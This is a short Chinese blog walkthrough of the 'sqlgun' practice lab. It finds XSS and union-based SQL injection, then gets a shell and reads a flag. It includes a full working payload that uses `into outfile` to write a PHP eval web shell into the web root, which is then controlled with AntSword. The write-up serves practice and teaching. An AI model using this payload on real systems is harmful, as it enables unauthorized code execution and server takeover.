当前位置: 首页 > article >正文

sqlgun靶场练习

article 2024/11/15 17:52:01

1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞

2.有xss大概率也存在sql注入,测试到3的时候发现有回显

3.进一步得出库名

4.要get shell的话我们可以尝试写一句话木马进去,构建payload

key=-1' union select 1,"<?php @eval($_POST[cmd]); ?>", 3 into outfile ‘/var/www/html/1.php’#

5.访问我们写进去的1.php,确认木马已写入

6.打开蚁剑连接

7.在根目录下得到flag


http://www.kler.cn/a/302310.html

相关文章:

  • Shell 脚本中的大小写陷阱:为什么 ${PWD} 而不是 ${pwd}?
  • 06.VSCODE:备战大项目,CMake专项配置
  • Linux 常用操作指令大揭秘(下)
  • qt QKeySequence详解
  • 微服务(二)
  • LabVIEW开发相机与显微镜自动对焦功能
  • DNS解析域名详解
  • 10分钟在钉钉上增加一个AI机器人
  • PHP即刻送达同城派送小程序系统
  • 谷歌谈流量波动不必担心的情况
  • RHCE--复习(一)之系统延迟任务及定时任务
  • <数据集>二维码识别数据集<目标检测>
  • 时尚购物新趋势:Spring Boot技术在时装系统中的应用
  • Python世界:力扣题43大数相乘算法实践
  • MySQL的DDL、DML、DQL
  • springboot 的共享session方案?
  • OpenCV影像数据处理入门-学习篇
  • vue环境搭建相关介绍
  • 在pycharm终端中运行pip命令安装模块时,出现了“你要如何打开这个文件”弹出窗口,是什么状况?
  • Vue基础明晰
  • chatGPT o1 重磅发布!像人类大脑一样思考和推理!
  • 快速入门和简单理解并发编程中的并发、并行、同步、异步,并且简单实现多进程和多线程
  • JS设计模式之代理模式:对象的“虚拟与现实”
  • 基于51单片机的灯盘检测(PCF8591+CD4051 )
  • mp3转文字要怎么处理?使用这4个工具就对了
  • C# 中的矢量化运算:提升性能的艺术